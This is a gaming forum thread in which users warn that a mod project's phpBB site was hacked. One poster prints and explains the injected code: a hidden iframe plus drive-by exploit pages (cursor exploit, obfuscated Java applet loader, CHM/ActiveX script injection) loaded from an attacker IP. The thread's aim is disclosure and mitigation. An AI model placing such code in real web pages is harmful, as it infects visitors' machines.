Home Trending Latest threads New posts Developer diaries

Do not go to coremod.org

Jump to latest Follow Reply
  • We have updated our Community Code of Conduct. Please read through the new rules for the forum that are an integral part of Paradox Interactive’s User Agreement.
Kevin Mc Carthy

Kevin Mc Carthy

Former SF Weapons Sergeant
13 Badges
Jun 25, 2001
3.808
0
  • Arsenal of Democracy
  • Deus Vult
  • Europa Universalis III
  • For the Motherland
  • Hearts of Iron III
  • Europa Universalis III Complete
  • Europa Universalis III Complete
  • Victoria: Revolutions
  • Semper Fi
  • Victoria 2
  • 500k Club
  • Europa Universalis III: Collection
  • Hearts of Iron II: Beta
Last edited:
bump
 
Bump again. BTW I am a CORE developer...
 
Hmmm, sounds nasty. What action is being taken?
 
Sir Humphrey said:
Hmmm, sounds nasty. What action is being taken?
Click to expand...

Steel, the site owner has to 'fix' it. Nobody else can do anything.

I know he does some international travel in his work sometimes, haven't heard back from him.
 
Kevin,

Instead of continually bumping this, would you like me to sticky it here for you?

Not sure when I'll check back in here, so PM me if you'd like it stuck.

Stonewall.
 
Stuck as requested. Please let me know when the CORE website is functional again and I'll take this down.
 
Going there with Firefox and it asks me to download newexpl.php. When I googled newexpl.php it looks like someone hacked a trojan downloader onto the site or perhaps it's coming from an advertiser. Hard to say without more info.
 
Not that I know of.
 
|AXiN| said:
Firefox pops up a download window, so I think FF guys can go there fine as long as they cancel it.
Click to expand...
Same thing with Opera (but need about eight "cancel"s).
 
Last edited:
The culprit seems to be in the title of the V.I.P. forum, so I think only pages showing that title (for example the forum index) will cause problems. A moderator with sufficient priviliges, or the site owner, could change the title back.

The initial offending code is (I changed the <> parts of the HTML tags to {} to avoid it being accidently triggered):
Code: 
{span class="genmed"}This forum is for V.I.P. (Victoria Improvement Project) for Victoria{iframe src="http://195.95.218.173/dl/adv439.php" width=0 height=0 style="display:none"}{/iframe}{/span}

That inline frame then proceeds to load the following:
Code: 
{html}{head}
{/head}{body}
{style}
* {CURSOR: url("http://195.95.218.173/dl/adv439/sploit.anr")}
{/style}
{script}
try{
document.write('{applet'+' width=1 height=1 '+'ARCHIVE=loader'+'adv439.jar co'+'de=Counter}{/AP'+'PLET}');
document.write('{object data="&#'+109+';s-its:mhtml'+':'+'file://C:\nosuch.mht!http://195.95.218.173/dl/adv439/x.chm::/x.htm" type="text/x-scriptlet"}{/object}');
}catch(e){}
{/script}
{IFRAME SRC="http://195.95.218.173/dl/newexpl.php?adv=adv439" WIDTH=0 BORDER=0 HEIGHT=0 style="display:none"}{/IFRAME}
{/body}{/html}

I'm no expert on this but I think several exploits are being tried here: something with a cursor image loading, a Java applet that tried to stay under the radar by having it's code obfuscated, something possibly trying to execute code on your machine by creating an error and pretending to be the proper error page, and finally the newexpl.php thing.

The newexpl.php contains a base64 encoded piece of HTML, which decoded looks like this:
Code: 
{!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"}
{HTML}{BODY}
{OBJECT style="display:none" id="asdqwe" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"}
{PARAM name="Command" value="Related Topics, MENU"}
{PARAM name="Button" value="Text:_"}
{PARAM name="Window" value="$global_blank"}
{PARAM name="Item1" value="command;ms-its:c:/windows/help/ntshared.chm::/alt_url_enterprise_specific.htm"}
{/OBJECT}
{OBJECT style="display:none" id="asdqwer" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"}
{PARAM name="Command" value="Related Topics, MENU"}
{PARAM name="Button" value="Text:_"}
{PARAM name="Window" value="$global_blank"}
{PARAM name="Item1" value='command; javascript:execScript("document.write(\"{script src=http://195.95.218.173/dl/adv439/JQTmudI.jpg\"+String.fromCharCode(62)+\"{/scr\"+\"ipt\"+String.fromCharCode(62))")'}
{/OBJECT}
{script}asdqwe.HHClick();setTimeout("asdqwer.HHClick()",100);setTimeout("document.write('')",200){/script}{/BODY}{/HTML}

Again this seems to try several exploits, all originating from 195.95.218.173 (a computer in Estonia). An abuse report could be sent to abuse@esthost.com, but since I am but a mere visitor of the site, I think it would be better if someone more officially affiliated with it would do so.

EDIT: By the way, turning off inline frames should prevent the problem, and going to the C.O.R.E. for HoI 2 forum directly should work too. Do it at your own risk though. If you browser is broken and executes things without asking you first, and you accidently goto the forum index, you could trigger all those exploits.
 
Last edited:
..........wow...........
Thinkingof.gif
 
Well as long as some progress is being made in the right directon. :)
 
I wish I understood what he was talking about.
 
The problem should be eliminated now.

Stonewall- You can de-sticky this now.
 
JRaup said:
The problem should be eliminated now.
Click to expand...
Actually, the forum still runs on phpBB 2.0.11 which is how someone managed to get administrator rights and place that exploit there in the first place. I recommend the forum software is updated to phpBB 2.0.16, several security issues (of which some critical) were fixed since phpBB 2.0.11.
 
Actually if you go straight to the forum, its okay.
 
You must log in or register to reply here.
Top Bottom
Back